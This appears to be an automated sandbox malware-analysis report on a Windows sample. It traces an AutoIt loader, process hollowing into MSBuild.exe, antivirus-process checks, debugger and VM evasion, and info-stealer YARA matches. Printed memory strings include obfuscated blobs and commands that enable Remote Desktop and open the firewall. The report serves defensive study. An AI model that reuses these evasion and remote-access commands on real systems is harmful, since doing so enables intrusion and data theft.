Source: AutoIt3.exe, 0000002A.00000002.2498679993.00000000016A6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmware
Source: Updater.exe, Updater.exe, 00000023.00000002.2238957940.0000000001527000.00000004.00000020.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2238485419.000000000143C000.00000004.00000020.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2238834001.00000000014EA000.00000004.00000020.00020000.00000000.sdmp, Updater.exe, 00000023.00000003.2233287021.00000000014D6000.00000004.00000020.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2238834001.00000000014C5000.00000004.00000020.00020000.00000000.sdmp, AutoIt3.exe, AutoIt3.exe, 00000026.00000002.2409569799.000000000164A000.00000040.00000020.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000002.2409643770.000000000169A000.00000004.00000020.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2404136165.0000000001685000.00000004.00000020.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2404136165.00000000016D6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: microsoft hyper-v video
Source: Reminder.tmp, 00000001.00000002.1687750310.00000000007FD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: MSBuild.exe, 00000025.00000002.2940433393.0000000001447000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000025.00000002.2940433393.0000000001474000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000025.00000002.2940433393.0000000001479000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014B2CBF LdrInitializeThunk, 35_2_014B2CBF
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_0074F607 BlockInput, 35_2_0074F607
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_006E2D33 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 35_2_006E2D33
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_006E310D GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 35_2_006E310D
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_006F4BF4 mov eax, dword ptr fs:[00000030h] 35_2_006F4BF4
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014B89A9 mov eax, dword ptr fs:[00000030h] 35_2_014B89A9
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014B89A2 mov eax, dword ptr fs:[00000030h] 35_2_014B89A2
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014B2ABD mov eax, dword ptr fs:[00000030h] 35_2_014B2ABD
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_014C4916 mov eax, dword ptr fs:[00000030h] 35_2_014C4916
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00C94BF4 mov eax, dword ptr fs:[00000030h] 38_2_00C94BF4
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_01662355 mov eax, dword ptr fs:[00000030h] 38_2_01662355
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_01668241 mov eax, dword ptr fs:[00000030h] 38_2_01668241
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_0166823A mov eax, dword ptr fs:[00000030h] 38_2_0166823A
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_016741AE mov eax, dword ptr fs:[00000030h] 38_2_016741AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 41_2_00444A1B mov eax, dword ptr fs:[00000030h] 41_2_00444A1B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 41_2_0044CC02 mov eax, dword ptr fs:[00000030h] 41_2_0044CC02
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_007320BE GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation, 35_2_007320BE
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_00702446 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 35_2_00702446
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_006F0E4D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 35_2_006F0E4D
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_006F0F9F SetUnhandledExceptionFilter, 35_2_006F0F9F
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_006F11EE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 35_2_006F11EE
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00CA2446 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 38_2_00CA2446
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00C90E4D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 38_2_00C90E4D
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00C90F9F SetUnhandledExceptionFilter, 38_2_00C90F9F
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00C911EE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 38_2_00C911EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 41_2_0042B08D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 41_2_0042B08D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 41_2_0042A60E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 41_2_0042A60E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 41_2_00445700 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 41_2_00445700
Source: C:\Users\user\AppData\Local\friend\Updater.exe Memory protected: page readonly | page read and write | page write copy | page execute | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 41_2_004080D0 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree, 41_2_004080D0
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_0073230F LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 35_2_0073230F
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_006E2D33 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 35_2_006E2D33
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_0073C078 SendInput,keybd_event, 35_2_0073C078
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_00752E89 GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event, 35_2_00752E89
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Process created: C:\Users\user\Desktop\Reminder.exe "C:\Users\user\Desktop\Reminder.exe" /VERYSILENT
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "wrsa.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "opssvc.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "avastui.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "avgui.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
Source: C:\Users\user\AppData\Local\friend\Updater.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping -n 5 127.0.0.1 >nul && updater.exe C:\ProgramData\\huv9LF4.a3x && del C:\ProgramData\\huv9LF4.a3x
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\friend\Updater.exe updater.exe C:\ProgramData\\huv9LF4.a3x
Source: C:\Users\user\AppData\Local\friend\Updater.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\edgheaa\AutoIt3.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_00731C68 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 35_2_00731C68
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_00732777 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 35_2_00732777
Source: Updater.exe, 0000001C.00000000.1722348560.0000000000791000.00000002.00000001.01000000.0000000B.sdmp, Updater.exe, 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmp, Updater.exe, 00000023.00000002.2240225926.000000000495E000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Updater.exe, AutoIt3.exe Binary or memory string: Shell_TrayWnd
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_006F0CA4 cpuid 35_2_006F0CA4
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 35_2_014A19D5
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: GetLocaleInfoA, 35_2_014A22F9
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: GetLocaleInfoA, 35_2_014A6959
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: GetLocaleInfoA, 35_2_014A69A5
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 35_2_014A1ADF
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: GetLocaleInfoA,GetACP, 35_2_014A7EF1
Source: C:\edgheaa\AutoIt3.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 38_2_0165126D
Source: C:\edgheaa\AutoIt3.exe Code function: GetLocaleInfoA, 38_2_016561F1
Source: C:\edgheaa\AutoIt3.exe Code function: GetLocaleInfoA, 38_2_0165623D
Source: C:\edgheaa\AutoIt3.exe Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 38_2_01651377
Source: C:\edgheaa\AutoIt3.exe Code function: GetLocaleInfoA,GetACP, 38_2_01657789
Source: C:\edgheaa\AutoIt3.exe Code function: GetLocaleInfoA, 38_2_01651B91
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetLocaleInfoW, 41_2_0044F013
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: EnumSystemLocalesW, 41_2_004585E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: EnumSystemLocalesW, 41_2_00458597
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: EnumSystemLocalesW, 41_2_0045867D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 41_2_00458708
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetLocaleInfoW, 41_2_0045895B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: EnumSystemLocalesW, 41_2_0044EAF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 41_2_00458A81
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetLocaleInfoW, 41_2_00458B87
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 41_2_00458C56
Source: C:\Users\user\AppData\Local\friend\Updater.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\edgheaa\AutoIt3.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\friend\Updater.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID
Source: C:\edgheaa\AutoIt3.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_00748C58 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,GetFileAttributesW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW, 35_2_00748C58
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_007159C7 GetUserNameW, 35_2_007159C7
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_0070B99F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 35_2_0070B99F
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_006E310D GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 35_2_006E310D
Source: C:\Users\user\AppData\Local\friend\Updater.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: find.exe, 00000013.00000002.1714878841.000001BBC6920000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000013.00000002.1714766876.000001BBC663B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: avgui.exe
Source: C:\edgheaa\AutoIt3.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match File source: 35.2.Updater.exe.4292be0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 38.2.AutoIt3.exe.44e2be0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 42.2.AutoIt3.exe.4382be0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 41.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 38.2.AutoIt3.exe.44e2be0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.2.Updater.exe.4292be0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 42.2.AutoIt3.exe.4382be0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 41.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000002A.00000002.2499336033.000000000437C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000002.2409431093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.2411065560.00000000044DC000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.2239705432.000000000428C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: AutoIt3.exe Binary or memory string: WIN_81
Source: AutoIt3.exe Binary or memory string: WIN_XP
Source: AutoIt3.exe Binary or memory string: WIN_XPe
Source: AutoIt3.exe Binary or memory string: WIN_VISTA
Source: AutoIt3.exe, 0000002A.00000003.2496893980.0000000004C20000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 15, 1USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: AutoIt3.exe Binary or memory string: WIN_7
Source: AutoIt3.exe Binary or memory string: WIN_8

Remote Access Functionality

Source: Updater.exe, 00000023.00000003.2237151080.00000000049E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: net start termservice
Source: Updater.exe, 00000023.00000003.2237151080.00000000049E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: Unknown exceptionbad array new length: genericiostreamiostream stream errorFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set805f14f85ee1dae0f3315e33e81c2a42cb36de7f397799e419deb9caf3a96a89322a8d6d5a45058fa30d5968f8d3f9443ad8a7JIODBcl2FnIVRC8mRbI=IobnPxWw8nRadzNvWa1f6qJdizVy2Ht=KHYBCp==RnUq2AZqGHVx4J==IHPx4J==WI8qCcJ2SngmQg==OSb54Q0qFqZU2Q==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLwK2YaWF==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhLQSi7mFJdGZhgutw66pc3UzBRSLm3gWY7E==RbPyVRVpyvdACJNDUEpHNu1pF7w9RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLw cPzPzCpGDM7RwDAPWOe61Q=RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhKVmi6KA7Umch4yNo7A==GKPYHOONOocwVUBuOI==UtzB3t==Rt3YLt==OPPZ8LKaacGa RKa9SGaVbeaVMCa vGaaLYaWvUaVMSa9wSa9R7a 9U=VSDqPv h6KBY12BehuXa6Kp0VSDqPv h6KA=VRru3v h6KA=Wsy=WIy=WIC=WIG=QLzu2 ==8wL53wtsFA==8wL53AR3FCb=WMbqWvrxVRVp wGC9MHubbfBISz61P0XMvG+MvK+IQvx4Pim6rQlHnmwFl==cp==GcPz1QV6MF== Rbq2zBwGm9aeGA=8RPD2f0pGDMk2GBhORP5JfKX513bX3poiyNjM0Xeft==RwDAPWOe6YV8gGJ2NKTGKUVdO6ccgHh7heM=NMTu3fJ=PRzE3z0v76xVLEB739==OKHKLt==RvzzPzJdO6Z gXNeizc=Ov3o4zdvCJhb1g==NKTMJoSBLzdXS0BJ2WRQhedQ9U==Nbf5Pz0jT09a2XM=Qb3D4zdrRR3B1zdwNR3y2VWsSRfzHz0jT09a2XM=JsyDCsVYHngURQ== bC=aRC=NR3z4z0r8G5KhXFaTatj80pSeUrj4nJmWb3D2L6hS1V8RyF8gVNkTKxqiQQvCSTkIHUyBL5qAFjI2V XT09QOUVehVtl76dSeTZwFiud9SDyBPWe8KIXLG97gOMZCqJ hDukFyud8Lrq2fKqTX49F6UPGVdr8KZkgC5JjPtbImt gEru2WG9avfA2bdsS7VbgC5oizBbS0SFGdQMAFiyBL5qFW4=IHUSs 
==MSHo3c5uIbjBPp==NR3z4z0r8G5KhXFaTat87LtkeTDj5Gem9839BQi08C5ce3NiQPNo6KNm2ZZmQWJ=RQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3T2cihzNQT1BG2TRnOEGm9Mv64z0vNqJj2Q==NR3y3A0XT1NE1W5aVLDoPz0jT6lfdmxhgOXl7Lxqg0H35n7VbMiBCMNwHHYSQzkUQN0=IMPz1PSsTKYjRQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3YW9eiyNaPqdc3TZeH02FSuDUJyCTMYVvW1A=RQfYLx0KRIRlenVngUpJT1IoQAveL2OpabfoPQS KqJpdWRtfPFm6KxX1CPrQGOmSbfpPPdGLE==UsuBCwF=OvPrOQ0p8JRbgHVege6pFp K3UDx3HOR8L3zOvPrOQ0p8JRbgHVege6pFpdK3UDx3HOR8L3zRP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSGlJeW K7ZofmZjixRb7rFhfZU=RwDAPA0g8I98eWY=J9uCEJ==J9uDC ==J9uCD ==J9uDDJ==NSPD3f0r8INRdWB Up==L9ia cPzPzCpGDMk2XlaIRmlFcLm3Vyo50BiLCcbNu1f6WsaF8urzbGX505be3ZPNvw7DmQ93DLuzA==G8SlHQmm8GM=F8urzbGvT087FrSryt==Rv38PQOw5KZieC9ajyM=ILP9PPSY8KplenFkgyd 9Wtq3TRx5GOq8L8zPPVdFY3feGY6N9==F6== Rb64zWs8687OXQ6QPI7GE== SKd3p== bzzPzdqABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Keyboard Layout\Preload0000041900000422000004230000043fSystemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice start= aut
Source: Updater.exe, 00000023.00000002.2239787208.0000000004300000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: net start termservice
Source: Updater.exe, 00000023.00000002.2239787208.0000000004300000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: Unknown exceptionbad array new length: genericiostreamiostream stream errorFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set805f14f85ee1dae0f3315e33e81c2a42cb36de7f397799e419deb9caf3a96a89322a8d6d5a45058fa30d5968f8d3f9443ad8a7JIODBcl2FnIVRC8mRbI=IobnPxWw8nRadzNvWa1f6qJdizVy2Ht=KHYBCp==RnUq2AZqGHVx4J==IHPx4J==WI8qCcJ2SngmQg==OSb54Q0qFqZU2Q==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLwK2YaWF==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhLQSi7mFJdGZhgutw66pc3UzBRSLm3gWY7E==RbPyVRVpyvdACJNDUEpHNu1pF7w9RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLw cPzPzCpGDM7RwDAPWOe61Q=RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhKVmi6KA7Umch4yNo7A==GKPYHOONOocwVUBuOI==UtzB3t==Rt3YLt==OPPZ8LKaacGa RKa9SGaVbeaVMCa vGaaLYaWvUaVMSa9wSa9R7a 9U=VSDqPv h6KBY12BehuXa6Kp0VSDqPv h6KA=VRru3v h6KA=Wsy=WIy=WIC=WIG=QLzu2 ==8wL53wtsFA==8wL53AR3FCb=WMbqWvrxVRVp wGC9MHubbfBISz61P0XMvG+MvK+IQvx4Pim6rQlHnmwFl==cp==GcPz1QV6MF== Rbq2zBwGm9aeGA=8RPD2f0pGDMk2GBhORP5JfKX513bX3poiyNjM0Xeft==RwDAPWOe6YV8gGJ2NKTGKUVdO6ccgHh7heM=NMTu3fJ=PRzE3z0v76xVLEB739==OKHKLt==RvzzPzJdO6Z gXNeizc=Ov3o4zdvCJhb1g==NKTMJoSBLzdXS0BJ2WRQhedQ9U==Nbf5Pz0jT09a2XM=Qb3D4zdrRR3B1zdwNR3y2VWsSRfzHz0jT09a2XM=JsyDCsVYHngURQ== 